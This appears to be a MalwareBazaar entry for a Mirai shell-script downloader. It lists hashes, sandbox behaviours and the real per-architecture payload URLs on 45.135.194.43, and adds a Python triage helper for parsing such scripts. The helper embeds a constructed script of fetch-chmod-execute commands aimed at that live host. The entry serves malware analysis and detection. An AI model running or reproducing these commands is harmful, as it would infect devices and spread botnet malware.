MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 297f5282869b4cb52f1748fa629b6856f56861ea561bb6e51b0aa2c771955994. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Mirai


Vendor detections: 9



SHA256 hash: 297f5282869b4cb52f1748fa629b6856f56861ea561bb6e51b0aa2c771955994
SHA3-384 hash: bb33c142dc7a6748d35b8c4c18be0ac47cb83d3765dda3b6cf4739d1fb65379736dbc777d68ff0a2f35504395a9fa1e9
SHA1 hash: 4a2f20114720f0f2af1fa745d03cb6a477eba585
MD5 hash: c97c386e949a7b7f4f87cbfbbd3a4049
humanhash: illinois-fourteen-arizona-high
File name: wget.sh
Signature Mirai
File size: 2'790 bytes
First seen: 2025-05-16 13:54:11 UTC
Last seen: 2025-05-16 16:28:51 UTC
File type: sh
MIME type: text/x-shellscript
ssdeep 24:vfnKnbfnA8nA2hikfnsneyfnvnpfnVn9fnWenWCnfnTNKnTuwhfn2n7fnFnJfnNv:vmIn2h0JfT7N6xh6zFy3hBT4k0
TLSH T1855148C622D7913138629A67B6BA4D0D32C0D09B9FC5EE48ADDC3CF9869CE593440B57
Magika shell
Reporter abuse_ch
Tags: mirai sh
Payload URLs referenced by this downloader script (SHA256 of the fetched binary where MalwareBazaar holds a copy, n/a otherwise):

URL                                        Malware sample (SHA256 hash)                                      Signature  Tags
http://45.135.194.43/bins/Tsunami.x86      6a889a1fc6489ff0adb0fa87cc61ae0a42b569e8cf89b469e725bdad760ca785  Mirai      elf mirai
http://45.135.194.43/bins/Tsunami.mips     13cab87cd2580d34f0c60b31897281fc5870f1a979b8ee71683374dfe0c250e1  Mirai      elf mirai
http://45.135.194.43/bins/Tsunami.arc      n/a                                                               n/a        n/a
http://45.135.194.43/bins/Tsunami.i468     n/a                                                               n/a        n/a
http://45.135.194.43/bins/Tsunami.i686     n/a                                                               n/a        n/a
http://45.135.194.43/bins/Tsunami.x86_64   n/a                                                               n/a        n/a
http://45.135.194.43/bins/Tsunami.mpsl     3f6efeb115b2c69c73c25799395824bd428024cdcc708036eeafe23cc08096ee  Mirai      elf mirai
http://45.135.194.43/bins/Tsunami.arm      4cd5a0b8f450bb4b1eaeabe20ed1d9ff59aae87e272998d56e73d813da5040c1  Mirai      elf mirai
http://45.135.194.43/bins/Tsunami.arm5     99bebadd78994cbddd0102281a400751050338ee7c6f1926f29093c966b6a0e5  Mirai      elf mirai
http://45.135.194.43/bins/Tsunami.arm6     7505011063ab00bcd3113fe2d7c3855d50af49a753015cd9018cbbfe65bd84db  Mirai      elf mirai
http://45.135.194.43/bins/Tsunami.arm7     fe9a5117526681f8c5c0b73d9ebca60f64b3c534c000374b1fe3f70dbc462a27  Mirai      elf mirai
http://45.135.194.43/bins/Tsunami.ppc      1225c2ed8afdb69733b59a23f77b6aa6ccd62c5f817c9da8a9c169c3aa157322  Mirai      elf mirai
http://45.135.194.43/bins/Tsunami.spc      bdd6d6b9b6a5c36ed92b6781ae0132cf361eeb27d32e9539581564663dccc29c  Mirai      elf mirai
http://45.135.194.43/bins/Tsunami.m68k     d980ea20258d480e3f0de0ec4db24a65ee3b90ee277df2098ddc201b674cf7c2  Mirai      elf mirai
http://45.135.194.43/bins/Tsunami.sh4      1a212f5d854cd5a21239232901ff2f5783ebabc73906304644b486474de6a1b3  Mirai      elf mirai

Intelligence


File Origin
# of uploads: 2
# of downloads: 68
Origin country: DE
Vendor Threat Intelligence
Verdict: Malicious
Score: 94.9%
Tags: downloader agent overt
Threat name: Linux.Downloader.Morila
Status: Malicious
First seen: 2025-05-16 13:55:15 UTC
File Type: Text (Shell)
AV detection: 17 of 24 (70.83%)
Threat level: 3/5
Result
Malware family:
Score: 10/10
Tags: family:mirai botnet:lzrd antivm botnet defense_evasion discovery linux upx
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Checks CPU configuration
UPX packed file
Enumerates running processes
Writes file to system bin folder
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Contacts a large (682165) amount of remote hosts
Creates a large amount of network flows
Mirai
Mirai family
Please note that we are no longer able to provide a coverage score for Virus Total.
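The sandbox behaviours above (writes to tmp, permission modification, executes the dropped ELF) and the URL table describe the usual shape of a Mirai-style downloader: change into a writable directory, fetch one payload per architecture, make it executable and run it. The following triage helper is an added example, not code from MalwareBazaar, abuse.ch or the Mirai/Tsunami authors. It pulls the payload URLs, target architectures, drop directories and execution steps out of such a script, and looks a file's SHA256 up against the hashes in this entry's URL table. The script body it parses is constructed to match those behaviours and URLs; it is not the real content of wget.sh. The regexes and function names are assumptions of the example.

```python
"""Triage helper for Mirai-style shell-script downloaders (added example)."""
import hashlib
import re
from urllib.parse import urlparse

# SHA256 -> payload URL, copied from the URL table of this MalwareBazaar
# entry; rows without a sample (n/a) are omitted.
KNOWN_PAYLOADS = {
    "6a889a1fc6489ff0adb0fa87cc61ae0a42b569e8cf89b469e725bdad760ca785": "http://45.135.194.43/bins/Tsunami.x86",
    "13cab87cd2580d34f0c60b31897281fc5870f1a979b8ee71683374dfe0c250e1": "http://45.135.194.43/bins/Tsunami.mips",
    "3f6efeb115b2c69c73c25799395824bd428024cdcc708036eeafe23cc08096ee": "http://45.135.194.43/bins/Tsunami.mpsl",
    "4cd5a0b8f450bb4b1eaeabe20ed1d9ff59aae87e272998d56e73d813da5040c1": "http://45.135.194.43/bins/Tsunami.arm",
    "99bebadd78994cbddd0102281a400751050338ee7c6f1926f29093c966b6a0e5": "http://45.135.194.43/bins/Tsunami.arm5",
    "7505011063ab00bcd3113fe2d7c3855d50af49a753015cd9018cbbfe65bd84db": "http://45.135.194.43/bins/Tsunami.arm6",
    "fe9a5117526681f8c5c0b73d9ebca60f64b3c534c000374b1fe3f70dbc462a27": "http://45.135.194.43/bins/Tsunami.arm7",
    "1225c2ed8afdb69733b59a23f77b6aa6ccd62c5f817c9da8a9c169c3aa157322": "http://45.135.194.43/bins/Tsunami.ppc",
    "bdd6d6b9b6a5c36ed92b6781ae0132cf361eeb27d32e9539581564663dccc29c": "http://45.135.194.43/bins/Tsunami.spc",
    "d980ea20258d480e3f0de0ec4db24a65ee3b90ee277df2098ddc201b674cf7c2": "http://45.135.194.43/bins/Tsunami.m68k",
    "1a212f5d854cd5a21239232901ff2f5783ebabc73906304644b486474de6a1b3": "http://45.135.194.43/bins/Tsunami.sh4",
}

# Constructed stand-in for a downloader script. This is NOT the content of
# wget.sh; it only mirrors the behaviours and URLs listed in the entry.
SAMPLE_SCRIPT = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.135.194.43/bins/Tsunami.x86; chmod +x Tsunami.x86; ./Tsunami.x86; rm -rf Tsunami.x86
wget http://45.135.194.43/bins/Tsunami.mips; chmod +x Tsunami.mips; ./Tsunami.mips; rm -rf Tsunami.mips
wget http://45.135.194.43/bins/Tsunami.mpsl; chmod +x Tsunami.mpsl; ./Tsunami.mpsl; rm -rf Tsunami.mpsl
wget http://45.135.194.43/bins/Tsunami.arm7; chmod +x Tsunami.arm7; ./Tsunami.arm7; rm -rf Tsunami.arm7
wget http://45.135.194.43/bins/Tsunami.sh4; chmod +x Tsunami.sh4; ./Tsunami.sh4; rm -rf Tsunami.sh4
"""

# Shell-aware enough for this script shape: a URL ends at whitespace or a
# command separator; a "cd" target is an absolute path.
URL_RE = re.compile(r"""(?:https?|tftp)://[^\s;'"|&<>]+""")
CD_RE = re.compile(r"\bcd\s+(/[^\s;|&]*)")
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")
EXEC_RE = re.compile(r"(?:^|[;\s|&])\./([^\s;|&]+)")


def extract_urls(script):
    """Return every download URL in order of appearance."""
    return URL_RE.findall(script)


def summarize(script):
    """Describe the downloader: hosts, per-architecture payloads, drop dirs,
    and whether it marks and runs what it fetched."""
    urls = extract_urls(script)
    executed = EXEC_RE.findall(script)
    return {
        "hosts": {urlparse(u).hostname for u in urls},
        "urls": urls,
        # Mirai droppers name payloads <base>.<arch>; the suffix is the arch.
        "architectures": [urlparse(u).path.rsplit("/", 1)[-1].split(".")[-1] for u in urls],
        "drop_dirs": CD_RE.findall(script),
        "sets_executable": bool(CHMOD_RE.search(script)),
        # Only count executions of names that were also downloaded.
        "executes_dropped": [e for e in executed if any(u.endswith("/" + e) for u in urls)],
    }


def lookup_sha256(digest_hex):
    """Map a SHA256 hex digest to the payload URL from the entry, or None."""
    return KNOWN_PAYLOADS.get(digest_hex.lower())


def lookup_file_bytes(data):
    """Hash a file's bytes and look the digest up."""
    return lookup_sha256(hashlib.sha256(data).hexdigest())


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

The architecture list is the useful triage signal: a script that fetches a dozen ELF variants from one host is not targeting a particular device but sweeping whatever executes it, which matches the "downloader" verdict above. Feed `lookup_file_bytes` the contents of anything found in /tmp or a system bin directory on a suspect box to tie it back to this entry.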

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Linux_Shellscript_Downloader
Author:albertzsigovits
Description:Generic Approach to Shellscript downloaders

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh 297f5282869b4cb52f1748fa629b6856f56861ea561bb6e51b0aa2c771955994 (this sample)

Delivery method
Distributed via web download

Comments